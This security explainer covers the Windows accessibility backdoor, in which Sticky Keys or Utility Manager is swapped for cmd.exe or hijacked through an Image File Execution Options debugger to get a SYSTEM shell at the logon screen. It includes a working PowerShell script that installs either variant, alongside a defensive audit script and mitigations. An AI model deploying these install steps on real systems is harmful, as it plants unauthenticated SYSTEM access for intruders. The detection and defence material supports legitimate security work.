An accessibility backdoor abuses Windows accessibility features that are reachable from the logon and lock screens, such as Sticky Keys (`sethc.exe`) and Utility Manager (`utilman.exe`), by replacing their binaries (or hijacking their launch) so they open a SYSTEM command prompt instead. An attacker who triggers the feature at the logon screen, for example by pressing Shift five times, gets a SYSTEM shell without authenticating. Setting it up needs local administrator rights, and the technique maps to MITRE ATT&CK T1546.008 (Event Triggered Execution: Accessibility Features).
What it is
Windows lets you launch accessibility tools from the logon screen, before anyone signs in: Sticky Keys (`sethc.exe`, triggered by pressing Shift five times) and Utility Manager (`utilman.exe`, the Ease of Access button in the corner of the logon screen, also Win+U). Because no user session exists yet, `winlogon.exe` starts them on the logon desktop as SYSTEM.
An accessibility backdoor makes that helper launch `cmd.exe` instead, so the attacker gets a SYSTEM shell straight from the login screen.
The technique and payload
With admin (typically post-exploitation), the attacker repoints the accessibility binary:
- Replace the binary: overwrite `C:\Windows\System32\sethc.exe` with a copy of `cmd.exe`, then press Shift five times at the logon screen for a SYSTEM prompt. System32 binaries are owned by TrustedInstaller, so even an administrator has to take ownership and grant write access before the overwrite succeeds.
- Or use Image File Execution Options to set a debugger: `reg add "HKLM\...\Image File Execution Options\sethc.exe" /v Debugger /d "cmd.exe"`. No file is replaced: Windows starts the "debugger" with the helper's path as its argument, and `cmd.exe` simply opens.
- The same works with `utilman.exe`, `osk.exe` and the other helpers started from the logon screen (`Magnify.exe`, `Narrator.exe`, `DisplaySwitch.exe`, `AtBroker.exe`).
It works over RDP as well: a server that presents the Windows logon screen to unauthenticated RDP clients (no Network Level Authentication) hands the SYSTEM shell to anyone who can reach port 3389. Documented for defensive context.
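The two setup variants and their revert as one script, an added example written for a throwaway lab VM rather than code from the original page. It assumes default install paths, an elevated PowerShell session, and that you run only one of the install functions at a time; the IFEO key is written out in full here, and `Undo-AccessibilityBackdoor` is a helper name chosen for this example.

```powershell
# Added example, not from the original page: both backdoor variants as functions,
# plus the revert, for a lab VM. Run from an elevated PowerShell session.
# Assumes default paths under $env:SystemRoot\System32; $Helper is any logon-screen
# accessibility binary (sethc.exe, utilman.exe, osk.exe, ...).

$Sys32    = Join-Path $env:SystemRoot 'System32'
$IfeoRoot = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'

function Install-ReplaceVariant {
    param([string]$Helper = 'sethc.exe')
    $bin = Join-Path $Sys32 $Helper
    # System32 binaries are owned by TrustedInstaller; administrators cannot write
    # them until they take ownership and grant themselves Full control.
    takeown.exe /f $bin | Out-Null
    icacls.exe $bin /grant "${env:USERNAME}:F" | Out-Null
    Copy-Item -Path $bin -Destination "$bin.bak" -Force      # keep the original for revert
    Copy-Item -Path (Join-Path $Sys32 'cmd.exe') -Destination $bin -Force
    # The file is now a signed copy of cmd.exe carrying the helper's name: pressing
    # Shift five times (sethc) or clicking Ease of Access (utilman) opens it as SYSTEM.
}

function Install-IfeoVariant {
    param([string]$Helper = 'sethc.exe')
    $key = Join-Path $IfeoRoot $Helper
    # With a Debugger value present, Windows runs "<Debugger> <full path of helper>"
    # instead of the helper itself; cmd.exe starts normally with that extra argument.
    New-Item -Path $key -Force | Out-Null
    Set-ItemProperty -Path $key -Name Debugger -Value 'cmd.exe'
}

function Undo-AccessibilityBackdoor {
    param([string]$Helper = 'sethc.exe')
    $bin = Join-Path $Sys32 $Helper
    Remove-Item -Path (Join-Path $IfeoRoot $Helper) -Recurse -Force -ErrorAction SilentlyContinue
    if (Test-Path "$bin.bak") {
        Copy-Item -Path "$bin.bak" -Destination $bin -Force
        Remove-Item -Path "$bin.bak" -Force
        # Hand ownership back so the file looks like every other System32 binary.
        icacls.exe $bin /setowner 'NT SERVICE\TrustedInstaller' | Out-Null
        icacls.exe $bin /remove "$env:USERNAME" | Out-Null
    }
    # If the backup is gone, 'sfc /scannow' restores the helper from the component store.
}

# On the lab VM: install one variant, lock the screen (Win+L), trigger the helper, revert.
# Install-IfeoVariant -Helper 'sethc.exe'
# Undo-AccessibilityBackdoor -Helper 'sethc.exe'
```

Both variants leave durable, easily inspected artifacts: a `sethc.exe` whose hash equals `cmd.exe`, a changed owner and ACL on the file, or a `Debugger` value under a key that should not exist at all. That is what the checks in the next section look for.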
How to defend
- Monitor the accessibility binaries (`sethc.exe`, `utilman.exe`, `osk.exe`) for replacement, and the Image File Execution Options keys for a `Debugger` value.
- Enable file integrity monitoring on System32 for these files.
- Restrict RDP and require Network Level Authentication, which makes the client authenticate before the Windows logon screen is ever shown, so an unauthenticated attacker never reaches the helper.
- Limit local administrator rights; setting the backdoor requires them (and, for the file-replacement variant, taking ownership of the binary from TrustedInstaller).
- Alert on shells whose parent is `winlogon.exe`. With the IFEO variant that is `cmd.exe` started by winlogon with the helper's path on its command line; with the replacement variant the process is still named `sethc.exe` but is `cmd.exe`'s code, so compare the image's hash or original file name against the genuine helper rather than matching on the process name alone.
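A single-host audit covering the items above, as an added example that is not code from the original page. It checks the helpers on disk for the replacement variant, the IFEO keys for the debugger variant, and then hunts process-creation events for shells started by `winlogon.exe`. It assumes an elevated session, Sysmon with its default ProcessCreate event (ID 1) where available, and Security event 4688 (with "Audit Process Creation" enabled) as a fallback; the function names are chosen for this example.

```powershell
# Added example, not from the original page: audit one host for both variants of the
# accessibility backdoor and hunt the logs for shells started by winlogon.exe.
# Run elevated. Assumes Sysmon (event 1) and/or Security 4688 process auditing.

$Helpers  = 'sethc.exe','utilman.exe','osk.exe','Magnify.exe','Narrator.exe','DisplaySwitch.exe','AtBroker.exe'
$Shells   = 'cmd.exe','powershell.exe','pwsh.exe'
$Sys32    = Join-Path $env:SystemRoot 'System32'
$IfeoRoot = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'

function Test-AccessibilityBinaries {
    # Replacement variant. A byte copy of cmd.exe still carries a valid Microsoft
    # signature, so a signature check alone proves nothing: compare the hash against
    # cmd.exe and the PE's OriginalFilename against the expected helper name.
    $cmdHash = (Get-FileHash -Path (Join-Path $Sys32 'cmd.exe') -Algorithm SHA256).Hash
    foreach ($h in $Helpers) {
        $path = Join-Path $Sys32 $h
        if (-not (Test-Path $path)) { continue }
        $orig = (Get-Item $path).VersionInfo.OriginalFilename
        $hash = (Get-FileHash -Path $path -Algorithm SHA256).Hash
        $sig  = (Get-AuthenticodeSignature -FilePath $path).Status
        # OriginalFilename mismatches are a heuristic: review them, do not auto-remediate.
        if ($hash -eq $cmdHash -or $orig -ne $h -or $sig -ne 'Valid') {
            [pscustomobject]@{ Kind='FILE'; Where=$path; Detail="OriginalFilename=$orig Signature=$sig IsCmd=$($hash -eq $cmdHash)" }
        }
    }
}

function Test-IfeoDebugger {
    # IFEO variant. No legitimate deployment sets a Debugger on these helpers, so any
    # value at all is a finding.
    foreach ($h in $Helpers) {
        $key = Join-Path $IfeoRoot $h
        $dbg = (Get-ItemProperty -Path $key -Name Debugger -ErrorAction SilentlyContinue).Debugger
        if ($dbg) { [pscustomobject]@{ Kind='IFEO'; Where=$key; Detail="Debugger=$dbg" } }
    }
}

function Find-WinlogonShells {
    # Both variants yield a child of winlogon.exe that is really a shell: a cmd.exe
    # (IFEO variant) or a process named like the helper whose image is cmd.exe
    # (replacement variant, visible through Sysmon's OriginalFileName field).
    $hits = @()
    $filters = @(
        @{ LogName='Microsoft-Windows-Sysmon/Operational'; Id=1 },   # Sysmon ProcessCreate
        @{ LogName='Security'; Id=4688 }                              # built-in process audit
    )
    foreach ($f in $filters) {
        $events = Get-WinEvent -FilterHashtable $f -ErrorAction SilentlyContinue
        foreach ($e in $events) {
            $d = @{}
            foreach ($n in ([xml]$e.ToXml()).Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
            # Sysmon and 4688 name the fields differently; normalise both.
            $image  = if ($d.Image)       { $d.Image }       else { $d.NewProcessName }
            $parent = if ($d.ParentImage) { $d.ParentImage } else { $d.ParentProcessName }
            if (-not $image -or -not $parent) { continue }
            if ((Split-Path $parent -Leaf) -ne 'winlogon.exe') { continue }
            $leaf = Split-Path $image -Leaf
            $isShell   = $Shells -contains $leaf
            $isFakeHlp = ($Helpers -contains $leaf) -and $d.OriginalFileName -and ($d.OriginalFileName -ne $leaf)
            if ($isShell -or $isFakeHlp) {
                $hits += [pscustomobject]@{ Kind='PROC'; Where="$($e.TimeCreated)"; Detail="$image <- winlogon.exe  $($d.CommandLine)" }
            }
        }
    }
    $hits
}

$findings = @(Test-AccessibilityBinaries) + @(Test-IfeoDebugger) + @(Find-WinlogonShells)
if ($findings) { $findings | Format-Table -AutoSize } else { 'No accessibility-backdoor indicators found.' }
```

Run it periodically or from your EDR's script engine; the disk and registry checks are cheap, while the log hunt is bounded by how much process-creation history the host keeps, so on a busy server scope `Get-WinEvent` with `StartTime` in the filter hashtable. A genuine helper started by winlogon (a user really pressing Shift five times) does not fire the PROC check, because its Sysmon `OriginalFileName` matches its name.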
References
- [1] MITRE ATT&CK, Event Triggered Execution (T1546), MITRE
- [2] Microsoft, Windows logon and security, Microsoft
- [3] MITRE ATT&CK, Persistence (TA0003), MITRE